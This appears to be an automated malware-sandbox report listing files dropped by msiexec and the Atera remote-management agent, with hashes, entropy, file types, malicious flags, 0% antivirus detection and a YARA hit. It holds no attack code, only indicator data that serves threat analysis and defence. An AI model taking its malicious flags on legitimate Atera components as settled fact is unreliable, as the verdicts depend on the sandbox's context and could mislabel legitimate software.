                                                                                                                                                                                                                                                                                              SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3318832
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                                              MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                                              SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                                              SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                                              SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):215088
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                                                                              MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                                                                              SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                                                                              SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                                                                              SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                                                                              MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                                                                              SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                                                                              SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                                                                              SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1346409
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999112358714754
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:24576:pBIpj/UxSFjQRUWNqDqb9JFOThCrI0rQIhPFhvWupUxNjcaPkH:pWpwwFsiWNqs9CThCrIEQUFhv+NjzE
                                                                                                                                                                                                                                                                                              MD5:B6DCC5B35594B03E37653026C02A869A
                                                                                                                                                                                                                                                                                              SHA1:84B2D4A35FDE41CE12DFC15760B44F2EDC0BD87B
                                                                                                                                                                                                                                                                                              SHA-256:986582F17A980254DB23F364423EC30DEDC09071947789CCAD13A35570F4DCF6
                                                                                                                                                                                                                                                                                              SHA-512:10D8A20F85572643D4DC4B33E4593E04057405F7FC97E21D8DC10F224C46E80FF1A7F4F15C3E22DF7EBC2F634F4C769DA8EB5858F1FCB46457209E93DBF72F97
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32679
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.993467033531541
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:YMiXbLuNFLgxnzeynrL390PbFM1Orsc+enjBy6qY2871Yu9IM8yzI:YHX+CRN0PbG1Orsc7XqYR71YyIM8II
                                                                                                                                                                                                                                                                                              MD5:38486C0ACFBA470AAC49D49A89B5DF27
                                                                                                                                                                                                                                                                                              SHA1:6BD5DE6CB5B60475612E768DB50BBC45936B5AFD
                                                                                                                                                                                                                                                                                              SHA-256:57825C85B5FD5FFBD35133FD24139BC623C10B50CBF9103E11B4E86E78225E54
                                                                                                                                                                                                                                                                                              SHA-512:BC7426C19CF9E74379785678A528A38E0D4005338B7F0A5039C2C3A46C8874FD04A5FE94D8BEE07CAEFE8AAA2A88E5E59179B7080CCB012F8F2FD4211C69A2D0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v6.0",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v6.0": {.. "Agent.Package.Availability/0.16": {.. "dependencies": {.. "Atera.Agent.Package.Infrastructure": "1.0.0",.. "MQTTnet": "4.1.2.350",.. "MQTTnet.Extensions.ManagedClient": "4.1.2.350".. },.. "runtime": {.. "Agent.Package.Availability.dll": {}.. }.. },.. "Microsoft.Extensions.Configuration/6.0.0": {.. "dependencies": {.. "Microsoft.Extensions.Configuration.Abstractions": "6.0.0",.. "Microsoft.Extensions.Primitives": "6.0.0".. },.. "runtime": {.. "lib/netstandard2.0/Microsoft.Extensions.Configuration.dll": {.. "assemblyVersion": "6.0.0.0",.. "fileVersion": "6.0.21.52210".. }.. }.. },.. "Microsoft.Extensions.Configuration.Abstractions/6.0.0": {..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.3186377650567
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:tpU+qNEN8hGUdlhkjqMCgoGIxBNPlaWxk4TKZ08gDT7iC6gW3GIXtHEje4TEpYiF:zU+CkuMChNPlakNcgD8ge1+Js76NA
                                                                                                                                                                                                                                                                                              MD5:8569FD90EA1BF5ECCCA2425B9BC7143A
                                                                                                                                                                                                                                                                                              SHA1:E5AC06B45E15D1E638526AE181FB0594E54C0BD3
                                                                                                                                                                                                                                                                                              SHA-256:000C035B77D9E882FC21D5C3E1BA84D8FB7BFE39BCCD9349657719D8CBF80AED
                                                                                                                                                                                                                                                                                              SHA-512:81451E5F80A02D913BA20F0F6B882FAA48CED88EBAC6922397031C2227C20B37E82FF4A9108C52D57A9C1F70C486E06E85CCAD1BEB780D180F1F651697804C9E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):161872
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.231624623837034
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:T5vnr5Tbx829UOeKnn2LFzZBp13u36wKp4CULCbodli:TBKjK2LFzZNfJULyZ
                                                                                                                                                                                                                                                                                              MD5:1922740D2479C7D0CD6FB57C3D739543
                                                                                                                                                                                                                                                                                              SHA1:877A807A396156BE1D0C2782391CABC29EA15760
                                                                                                                                                                                                                                                                                              SHA-256:20443F66E184311FD412158CB162E36B0172332CD6D401CEC9EE5FE17DF75E58
                                                                                                                                                                                                                                                                                              SHA-512:D624BAD0FCD8AFC190A5DE241DA341A3F39D6AAA0E5EACDF8B14E8E74515B688F06E2CDC75DA0634880EA98238A1D26CD2D2BFAEDB6D92067DACE99D0963975C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):14
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8073549220576055
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhVLD:WDLD
                                                                                                                                                                                                                                                                                              MD5:9A7D20AAA012D185DB528C72378B0ACB
                                                                                                                                                                                                                                                                                              SHA1:CD17C5DDB04E5CBAEBA56BB883B2BD0BF8C529DE
                                                                                                                                                                                                                                                                                              SHA-256:CBA7D06C662A6601164CBC5A0F4086E247DC1ACA7CCF2F72F4443C88DDB29095
                                                                                                                                                                                                                                                                                              SHA-512:961707F9926401EED9FDF892484527D253514F336B2AEF0A450184EE125DB940823E933739ABED422BC97B37E4094EFB3C9C355154F86984EB36508ED28BEE90
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=0.16..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):253
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.585549446641918
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:3Hp/hdNyhAkI/XCkyFNOJeZS1sHZeQ6NOCUo+K8EkNTy:dFkp5MeU1s5hex+K8Es2
                                                                                                                                                                                                                                                                                              MD5:24E4653829DE1022D01CD7DDD26E2F22
                                                                                                                                                                                                                                                                                              SHA1:9160A009CB381E044BA4C63E4435DA6BFEB9DC6D
                                                                                                                                                                                                                                                                                              SHA-256:DED3AEB5856A11DB0B654A785574490CAB55839EBFB17EFE9E39B89618FC5B91
                                                                                                                                                                                                                                                                                              SHA-512:EFD4BBBA1BAEC0B47003831510E3AA539DB9EF468E0F06BA9D7BA6D0B3800035F7C818D7D90171BFD377EC97D08C4617555BCFF635DD83EFCEB412B1A9CCA820
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{.. "runtimeOptions": {.. "tfm": "net6.0",.. "framework": {.. "name": "Microsoft.NETCore.App",.. "version": "6.0.0".. },.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false.. }.. }..}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):59472
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.23062387412576
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:p36VpFishtGAb2BAst2t1z2C0qePts2+lpmjouk3KKlGT1S3k7Z2GEpYi60X2M:OFan4tkC0qH2ip2ouXi21oG2n76c
                                                                                                                                                                                                                                                                                              MD5:1E5A96F64AB2BD11D6D6ABE917B6DEF0
                                                                                                                                                                                                                                                                                              SHA1:B5E3B831BD0FD638B83553352F31088D67846F03
                                                                                                                                                                                                                                                                                              SHA-256:49747FAB0830BEA9BED2ADCE543E61F75FF748340B78CF08CA598F9577B9C62E
                                                                                                                                                                                                                                                                                              SHA-512:7673DBBA81AD88CC13AF1C195154D1D5764A343AAE59B67D5C97355FEF40E67CF4E517878A600E42759167B8B357D0FDCBAED4CAA99AD522D60E8CF00CB86CE5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Atera.Agent.Package.Infrastructure.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):54352
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2479944729426595
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:wjPkdaG23BdHAnoekKhbdzn9kpWcwfRLzfoZrx6nnPMfm8XoJE5GtSdxEpYi60a:ePGShI7mW1ZoZrcn0e0oJ4Gtu676f
                                                                                                                                                                                                                                                                                              MD5:EA230454940D473CF51913ACA3B16652
                                                                                                                                                                                                                                                                                              SHA1:278C6D8FF7EA387B6B4FDC4063E891CD73B537CB
                                                                                                                                                                                                                                                                                              SHA-256:ACBBA44A069132A6B42EDF97F9301638AC048BB40BFF03ED14A40ADF95B1FC71
                                                                                                                                                                                                                                                                                              SHA-512:7E8617D67CDC23B5877438FBC1A17B552CC7F6D60237ECCAF557E385F0B450860D7678750D8B17B501936C33F9B41C03286D86EB35C19A4B61FDDCCFA3AE4F44
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):311888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.172921538830622
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:7F0eAyIQXbKwPMF83GUN/7a3zyROhmogpE2/M3jA:78QLKwPMKGUuBhh33jA
                                                                                                                                                                                                                                                                                              MD5:157CC7C91E4BD0762F22115A83FD1304
                                                                                                                                                                                                                                                                                              SHA1:15346E10DC67CDB18D1BA2907B9EA0C8639DC620
                                                                                                                                                                                                                                                                                              SHA-256:BC1009ABB39FF7FD048EFFB52E586B2D1C14B9499A195DE4AA750C3613F2DE49
                                                                                                                                                                                                                                                                                              SHA-512:D196C7E35FE131703FE2214A341CAF1B24162C53D168E552BB1EB292ACA91A7B60C682D3E18179483BAE5B30901A43F4640F04604604FF3EB1C7E25D84E302CE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):26192
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.566795920462708
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Ym++Js0qJ63NU17qtlR9iaTG/0wEzRjz6sMHJhOnAWM/aWsrNWsNyb8E9VF6IYic:3lso3W7qHypd//S7EpYi60sAw
                                                                                                                                                                                                                                                                                              MD5:0F40262268DB5E64DC7860A799B14784
                                                                                                                                                                                                                                                                                              SHA1:ABFB078EC0A37045F909E58DF75994103E7576B6
                                                                                                                                                                                                                                                                                              SHA-256:BAF1C2217E59C905521F286C506291B1EF07FBAE426B804927AFF448B57C58C2
                                                                                                                                                                                                                                                                                              SHA-512:0D45A8F062813F84BE24976C642C953A9367DCC7543136A40A92BEF8216647BCAA7B8C58E84825C264F10D37C0319F92122DAC4FF498441B35EB09CD4980E816
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):34896
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.489176330590773
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:DRnQyuN61yKW1Guh2dIewN3czA8i1Krao8EpYi60RD:DdgA1yKW1L0dkNc081+oV76E
                                                                                                                                                                                                                                                                                              MD5:34B8504411DAF6B69B362203E11DB477
                                                                                                                                                                                                                                                                                              SHA1:34A1FC5F1A073725E358AE2BE24D67C3A9013EED
                                                                                                                                                                                                                                                                                              SHA-256:E60445F54E33A72F2D8793A25C0F1E25DFA2D3B8189C5BC3EE477502BA920140
                                                                                                                                                                                                                                                                                              SHA-512:4D88EEEBC8E7A380D85DC8F55F4E58E14CB635FA801AC04FE246AAC1EA1F79ED663C5947ABEE2074DAEDBC85C97311159D3DFBB1FCECEB048177FADADC453374
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):24144
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.679156647753176
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:I99FrztnCvZrlMIPTlLn9by3WKbW97nWaNyb8E9VF6IYijSJIVxut8X7d/oE:Abztn2AmxniKfEpYi60ZeE
                                                                                                                                                                                                                                                                                              MD5:63030F7861AFE3D57EEA5278B14671B6
                                                                                                                                                                                                                                                                                              SHA1:130B90DA81BCD69549D7272DCC04ADDAB1DC18D2
                                                                                                                                                                                                                                                                                              SHA-256:77A8B815ABF8316E41D5A20DACE2B1EBC7A21D55B0D812B0B29E564C1A79BD1D
                                                                                                                                                                                                                                                                                              SHA-512:82730F5B15201E669706EFF1DC617FCDC69ADAAF916F6127291999382DF631769387CCF06B70B52AC2BAA8A08A25CC81CA00B7CB2D6F4908D3A84F9E464B8E74
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):19536
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.730237218870487
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ssGu6f0Ux3STFWUQeWiNyb8E9VF6IYijSJIVx/HyZr:ssGuWRTiEpYi606J
                                                                                                                                                                                                                                                                                              MD5:D5B282AA4788540C2FB0FBC9902649E1
                                                                                                                                                                                                                                                                                              SHA1:2439B443C6568BAACB95C2E67968F5FEABE92E18
                                                                                                                                                                                                                                                                                              SHA-256:3F11122AE5F99C29275057D92E4611D4F0611ED7FF7CC2DDC7FF50714462A241
                                                                                                                                                                                                                                                                                              SHA-512:3510BFE7F4DB4B63AC0026ACFF88672AEA82B96AB57D966E718F9FB095915C647B255B8BD02F5CA4D79FA19BA342153692F0760A3FC142CC1C233E4DC03C30DD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27216
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.552210662146974
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:EY5JfZB7plLDwLx0umTZXA/XABRfhzWqr6WBNyb8E9VF6IYijSJIVxeB8eu74u5O:lrd8Y0wRhz5EpYi60eXIE
                                                                                                                                                                                                                                                                                              MD5:420ED08E70F259AEE9353E4C9B51D392
                                                                                                                                                                                                                                                                                              SHA1:BEFE42898F0FE7713325A2F923524C19DA2E646E
                                                                                                                                                                                                                                                                                              SHA-256:1C0DCEA5EA2D00EB689E8498727027E13BFCE4224EC92040AB55ACBB663A46FE
                                                                                                                                                                                                                                                                                              SHA-512:9874FC1D5A162BC92F2006793CF5431A82AC21D8F27458004C2E99A9D1E504B50C6431A27DC26A84489BDA5D1C8ED9A1BA53EC7F10B3440C201BF36F8CDD7203
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):26704
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.558340768117845
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:AI2/cK/FWwbGXC8e1lje1l6RWkb2WmNyb8E9VF6IYijSJIVxEtI:AI2/cqFWwSl6hXGEpYi60t
                                                                                                                                                                                                                                                                                              MD5:85A89861DE331E9F0BEAC235187512BE
                                                                                                                                                                                                                                                                                              SHA1:00973F441FE6278AEE21DAED8811D05383356F50
                                                                                                                                                                                                                                                                                              SHA-256:418F2A8936A03E968ABB72DB0FBF4005F0B60D1BADAF1F121DC45855F71EBF4C
                                                                                                                                                                                                                                                                                              SHA-512:9844272DC89D8A9A5851ED17551822D7DEC6430C180EBD98BB7A73463E44869C168FF0CD110596272589AE73C968AE4B1489734EFB449E34EE306E285B894CC3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25680
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.505889105423614
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:nw6kebL1iFn6d6E1oE1LdAAW9ACWDNyb8E9VF6IYijSJIVxvcTERE:xZbcWusrEpYi60m
                                                                                                                                                                                                                                                                                              MD5:6D9218D0B9D5E103BA0FE7E9DB975F7F
                                                                                                                                                                                                                                                                                              SHA1:2F661F39C09925555375942A5D80A015F556E8B0
                                                                                                                                                                                                                                                                                              SHA-256:7F6BED28E99D475E90160AC74CE81AED6CBCE8F67F475E73AE66DF13E92B4AE2
                                                                                                                                                                                                                                                                                              SHA-512:774381BCF9B344AF16AF8F3A374F1A5C8B381B0C3FE8806BF6AEB0B4773F42FBDC0A869C03A5B213B440F6C0AE8CC948EB17FC31E6B991FA15EEB3B6FBE71D80
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):37456
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.448738986499155
                                                                                                                                                                                                                                                                                              Encrypted:false
